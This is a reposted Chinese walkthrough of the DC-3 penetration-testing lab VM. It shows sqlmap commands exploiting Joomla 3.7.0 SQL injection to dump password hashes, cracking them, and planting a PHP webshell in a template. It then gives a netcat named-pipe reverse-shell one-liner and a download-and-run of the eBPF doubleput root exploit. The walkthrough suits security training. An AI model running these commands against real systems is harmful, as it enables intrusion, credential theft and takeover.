IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> 065 渗透测试实战,靶机 DC-3 -> 正文阅读

[系统运维]065 渗透测试实战,靶机 DC-3

一:环境准备

下载:点我
下载之后完成安装,过程详情请参考,063 渗透测试实战,靶机 DC-1

打开DC-3
在这里插入图片描述

?

二:Kali nmap扫描

打开Kali:
在/root/tmp目录下创建一个DC-3的文件夹
然后nmap -sP 192.168.100.0/24 -oN nmap.sP扫描内网主机。
在这里插入图片描述

确定主机之后,再扫描端口号,nmap -A 192.168.100.2 -p 1-65535 -oN nmap.A
发现只开放了80端口
在这里插入图片描述
浏览器访问下,
在这里插入图片描述

?

三:对该网址进行指纹识别

whatweb http://192.168.100.2

在这里插入图片描述
发现是joomla!

维基百科的解释:
Joomla!是一套自由、开放源代码的内容管理系统,以PHP撰写,用于发布内容在万维网与内部网,通常被用来搭建商业网站、个人博客、信息管理系统、Web 服务等,还可以进行二次开发以扩展使用范围。其功能包含可提高性能的页面缓存、RSS馈送、页面的可打印版本、新闻摘要、博客、投票、网站搜索、与语言国际化。Joomla!是一套自由的开源软件,使用GPL许可,任何人随时都能下载 Joomla! 并立即使用它。

利用一款扫描工具:joomscan
先安装

sudo apt update
apt install joomscan

扫描命令:joomscan --url http://192.168.100.2
得到版本是3.7
在这里插入图片描述

?

四:利用脚本搜索有无漏洞

searchsploit joomla 3.7.0
在这里插入图片描述
发现存在一个sql注入漏洞。

把漏洞文件复制到当前目录下:
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla_v370_sqli.txt
在这里插入图片描述
然后查看这个txt文件,得知可以使用sqlmap工具
在这里插入图片描述
把上述的命令,复制并修改http地址。
sqlmap -u "http://192.168.100.2/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
一直回车就行。
上述命令中,参数--dbs是列出当前的服务器中有哪些库名。运行结果如下:
在这里插入图片描述
说明这个几个库存在sql注入漏洞。

获取当前数据库的名字,(参数:--current-db)
sqlmap -u "http://192.168.100.2/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]
在这里插入图片描述
得到当前数据库的名字为:joomladb

获取当前数据库joomladb有哪些表,(参数:-D "joomladb" --tables
sqlmap -u "http://192.168.100.2/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]
在这里插入图片描述
找到users表,查看表中有哪些字段,(参数:-D "joomladb" -T "#__users" --columns
sqlmap -u "http://192.168.100.2/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]
按y选择路径,选择1,设置10线程
在这里插入图片描述
在这里插入图片描述
这样就得到了users表中的字段内容。
从users表中,我们对name和password感兴趣。。
所以,(参数:-D "joomladb" -T "#__users" -C "name,password" --dump)
sqlmap -u "http://192.168.100.2/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]
在这里插入图片描述
这样就得到了一个加密的密文。
$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
创建一个文件保存它
在这里插入图片描述
解密密文:john joomla_v370_admin_hash.txt
在这里插入图片描述
得到密码:snoopy

?

五:浏览器登录后台页面

由上面的扫描命令:joomscan --url http://192.168.100.2 得到登录网站后台地址http://192.168.100.2/administrator/
浏览器登录。admin/snoopy
在这里插入图片描述
点击红框内容,
在这里插入图片描述
红框的内容谷歌翻译下
在这里插入图片描述
得知这次DC-3的实战只有一个目标,那就是获得root权限。
而获取root权限,我们一般可以通过上传大小马进而提权

进入如下目录:
在这里插入图片描述
发现有个Beez3 Details and Files,点进去,发现可以创建文件,这时候我们就可以考虑上传木马了。
在这里插入图片描述

?

六:上传木马

要上传木马,就得知道当前文件所在目录,
鉴于对网站的常识理解,模板目录一般放在根目录下的templates目录,浏览器访问下,发现页面是空白的,如下图
在这里插入图片描述
这说明什么?说明这个目录存在,因为没有报404之类的错误。
同理,我们输入beez3
在这里插入图片描述
说明beez3目录也是存在的。
又因为有个html目录,
在这里插入图片描述
同样进行尝试,成功的显示了html的内容。
在这里插入图片描述
这样我们就找到了文件路径了

在html目录下新建文件yjh:
在这里插入图片描述
编辑、保存文件
在这里插入图片描述

?

七:建立反弹shell

开启第三台虚拟机win10,
使用蚁剑连接http://192.168.100.2/templates/beez3/html/yjh.php
在这里插入图片描述

在这里插入图片描述
连接成功。

?
反弹shell:

Kali开启监听
nc -lvvp 2333
在这里插入图片描述
在蚁剑上:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.7 2333 >/tmp/f
在这里插入图片描述
回到kali上,查看是否开启成功
在这里插入图片描述
反弹成功。

?

八:提权

通过whoami 查看权限,发现不是root,则需要提权
既然要提权,那就需要了解当前系统的版本等一系列信息。
通过命令hostnamectl查看信息

hostnamectl:用于查询和更改系统主机名。 还可以显示Linux发行版和内核版本

在这里插入图片描述
发现版本号是ubuntu 16.04

查找Ubuntu 16.04版本的漏洞
searchsploit Ubuntu 16.04
在这里插入图片描述
复制文件到本地,

cd /root/tmp/DC-3 
cp /usr/share/exploitdb/exploits/linux/local/39772.txt ubuntu1604.txt

打开这个文件,cat ubuntu1604.txt可以看到关于漏洞说明的具体内容。

这个文件的末尾提到,可以去这个地址下载exploit
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
有访问不了github的小伙伴,我这里给了个自己的坚果云(百度盘太慢了,真特么垃圾,所以没用了)的分享,点我下载 (访问密码:52d0DZ)

下载之后,放进虚拟机中,我们直接访问本地服务器下载文件。
我这里是用win10的虚拟机(IP:192.168.100.6)当服务器
在这里插入图片描述
下载到靶机上,

步骤:
	wget http://192.168.100.6/39772.zip
	unzip 39772.zip
	cd 39772
	tar -xvf exploit.tar
	cd ebpf_mapfd_doubleput_exploit
	./compile.sh
	./doubleput

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提权成功,获取flag
在这里插入图片描述

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2022-04-29 12:31:28  更:2022-04-29 12:32:20 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 19:35:33-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码